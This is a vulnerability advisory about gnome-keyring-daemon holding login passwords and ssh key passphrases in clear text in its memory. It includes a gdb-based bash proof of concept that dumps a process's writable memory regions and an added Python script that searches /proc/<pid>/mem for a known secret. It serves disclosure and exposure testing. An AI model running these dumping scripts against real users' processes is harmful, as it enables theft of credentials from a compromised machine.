gnome-keyring-daemon is vulnerable to local credential disclosure.
Fortunately the attack can only be carried out on an already compromised
machine, but in that case an attacker can leverage gnome-keyring-daemon
to obtain sensitive data.
The daemon keeps the passwords of logged-in users in clear text in its
process memory, and so exposes them (the login password, the passphrase
of the keys held by ssh-agent, etc.) to anyone who can read that memory.
In this scenario the attacker can read the data instantly, without
cracking anything or installing a keylogger, a sniffer or other tools:
the secrets are simply extracted from the memory of gnome-keyring-daemon
with a debugger such as "gdb" (which needs the privilege to ptrace the
daemon, i.e. root, or the owning user where ptrace is not restricted).
At this URL there is a script (named "memory_dump.sh") that can be used
as a PoC:
http://www.lucaercoli.it/
memory_dump.sh:
#!/bin/bash
# Usage: ./memory_dump.sh <pid>
# Dumps every private writable mapping (rw-p) of the target process into
# one file per region, in a directory named after the pid. Requires the
# privilege to ptrace the process (root, or its owner where allowed).
[ -n "$1" ] || { echo "usage: $0 <pid>" >&2; exit 1; }
pid="$1"
mkdir -p "$pid" && cd "$pid" || exit 1
grep rw-p "/proc/$pid/maps" \
| awk '{print $1}' \
| sed 's/-/ /' \
| while read -r mem_start mem_end; do
    gdb --pid "$pid" --batch-silent -ex "dump memory $mem_start-$mem_end.dump 0x$mem_start 0x$mem_end"
  done
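As an added example (not part of the original advisory or of memory_dump.sh), the following Python script applies the same region selection as the PoC (only `rw-p` mappings from /proc/<pid>/maps) but reads /proc/<pid>/mem directly instead of attaching gdb, and searches the regions for a given plaintext string rather than writing dump files. The maps excerpt, the inode and address values and the planted secret are constructed for the example; reading another process's mem file needs the same privilege gdb would.

```python
#!/usr/bin/env python3
"""Search the private writable mappings (rw-p) of a process for a plaintext
secret by reading /proc/<pid>/mem directly instead of dumping with gdb.
Added example, not part of the original advisory. Needs the same privilege
gdb would: root, or the process owner where ptrace is not restricted."""
import os
import re
import sys
from typing import List, Optional, Tuple

# One line of /proc/<pid>/maps: "start-end perms offset dev inode [pathname]"
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+\s*(.*)$"
)

PROC_AVAILABLE = os.path.exists("/proc/self/mem")

# Constructed /proc/<pid>/maps excerpt used to exercise the parser offline;
# the inode and address values are made up for the example.
SAMPLE_MAPS = """\
00400000-00452000 r-xp 00000000 08:02 173521 /usr/bin/gnome-keyring-daemon
00651000-00652000 rw-p 00051000 08:02 173521 /usr/bin/gnome-keyring-daemon
00e03000-00e24000 rw-p 00000000 00:00 0      [heap]
7ffc1d2f3000-7ffc1d2f5000 r--p 00000000 00:00 0      [vvar]
7ffc1d31a000-7ffc1d33b000 rw-p 00000000 00:00 0      [stack]
"""

# Constructed "credential" planted in this interpreter's own memory so a
# self-scan (pid=None) has something to find.
PLANTED_SECRET = b"correct-horse-battery-staple-7e1c"


def parse_rw_regions(maps_text: str) -> List[Tuple[int, int, str]]:
    """Return (start, end, name) for every rw-p mapping, mirroring
    `grep rw-p /proc/$pid/maps` in memory_dump.sh."""
    regions = []
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if m and m.group(3) == "rw-p":
            regions.append((int(m.group(1), 16), int(m.group(2), 16), m.group(4)))
    return regions


def find_in_process(pid: Optional[int], needle: bytes,
                    chunk: int = 1 << 20) -> List[Tuple[int, str]]:
    """Return (address, mapping name) for every occurrence of `needle` in the
    rw-p regions of `pid` (None = this process, via /proc/self)."""
    if not needle:
        raise ValueError("needle must be non-empty")
    proc = "/proc/self" if pid is None else f"/proc/{pid}"
    with open(f"{proc}/maps") as f:
        regions = parse_rw_regions(f.read())
    hits = []
    with open(f"{proc}/mem", "rb", buffering=0) as mem:
        for start, end, name in regions:
            pos, carry = start, b""
            while pos < end:
                try:
                    mem.seek(pos)
                    data = mem.read(min(chunk, end - pos))
                except OSError:
                    break  # region not readable from here; skip the rest of it
                if not data:
                    break
                # Prepend the tail of the previous chunk so a match that
                # straddles the chunk boundary is not missed.
                buf = carry + data
                off = buf.find(needle)
                while off != -1:
                    hits.append((pos - len(carry) + off, name))
                    off = buf.find(needle, off + 1)
                carry = buf[-(len(needle) - 1):] if len(needle) > 1 else b""
                pos += len(data)
    return hits


def main(argv: List[str]) -> int:
    if len(argv) != 3:
        print(f"usage: {argv[0]} <pid> <secret-string>", file=sys.stderr)
        return 2
    hits = find_in_process(int(argv[1]), argv[2].encode())
    for addr, name in hits:
        print(f"{addr:#x} {name}")
    return 0 if hits else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `./scan.py <pid of gnome-keyring-daemon> '<known password>'` to confirm whether a given credential is recoverable from the daemon's writable memory; the self-scan with `pid=None` is only there to show the search working on a process you are always allowed to read.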